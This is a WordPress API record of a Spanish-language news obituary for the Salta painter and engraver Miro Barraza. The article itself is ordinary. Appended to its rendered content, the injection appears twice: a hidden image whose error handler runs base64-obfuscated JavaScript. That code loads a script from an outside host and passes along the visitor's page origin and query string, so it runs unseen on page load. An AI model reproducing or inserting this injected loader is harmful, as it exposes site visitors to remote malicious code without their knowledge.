{"id":3700,"date":"2024-02-14T18:41:42","date_gmt":"2024-02-14T21:41:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3700"},"modified":"2025-08-14T00:00:31","modified_gmt":"2025-08-14T03:00:31","slug":"artes-visuales-la-cultura-despide-al-reconocido-artista-miro-barraza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3700","title":{"rendered":"Artes Visuales: la cultura despide al reconocido artista Miro Barraza"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-65ef7ab7b2e3a3044c9824a5ac08dde4\" style=\"background-color:#910e2f\"><em>Nacido en Chile y radicado en la provincia, el artista visual falleci\u00f3 a la edad de 83 a\u00f1os. Fue un destacado pintor, grabador, escen\u00f3grafo premiado a nivel nacional e internacional, ejerci\u00f3 la docencia en la Escuela Provincial de Artes Visuales y Polivalente de Arte de Salta.<\/em><\/h3>\n\n\n\n<p>Jos\u00e9 Delmiro Barraza naci\u00f3 en Coquimbo, Chile en 1940, pero a muy temprana edad se radic\u00f3 en Salta. Estudi\u00f3 en la Escuela Provincial de Artes Visuales Tom\u00e1s Cabrera y all\u00ed conoci\u00f3 a los artistas Carlos Luis Garc\u00eda Bes y Luis Pretti.<\/p>\n\n\n\n<p>Fue un destacado artista visual, ejerci\u00f3 la docencia en la Escuela Provincial de Artes Visuales y Polivalente de Arte de Salta y desempe\u00f1\u00f3 como grabador y escen\u00f3grafo. Desde la d\u00e9cada de los a\u00f1os setenta, figur\u00f3 en m\u00e1s de cuarenta exposiciones individuales y colectivas en salones nacionales, provinciales, municipales, regionales y de pa\u00edses vecinos como Chile y Bolivia.<\/p>\n\n\n\n<p>Dalmiro fue premiado a lo largo de su trayectoria con m\u00faltiples distinciones nacionales, provinciales y municipales, su obra ha sido ya ampliamente reconocida. Entre otros, obtuvo ocho premios en los Salones Provinciales de Salta, entre los a\u00f1os 1971 y 1998, y tres premios en Salones Municipales de Salta, entre los a\u00f1os 1971 y 1991.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/artes-visuales-la-cultura-despide-al-reconocido-artista-miro-barraza-94189\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Nacido en Chile y radicado en la provincia, el artista visual falleci\u00f3 a la edad de 83 a\u00f1os. Fue un destacado pintor, grabador, escen\u00f3grafo premiado a nivel nacional e internacional, ejerci\u00f3 la docencia en la Escuela Provincial de Artes Visuales y Polivalente de Arte de Salta. Jos\u00e9 Delmiro Barraza naci\u00f3 en Coquimbo, Chile en 1940, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3701,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[23,26],"tags":[],"class_list":{"0":"post-3700","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-audio-visuales","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3700"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3700"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3700\/revisions"}],"predecessor-version":[{"id":6851,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3700\/revisions\/6851"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3701"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}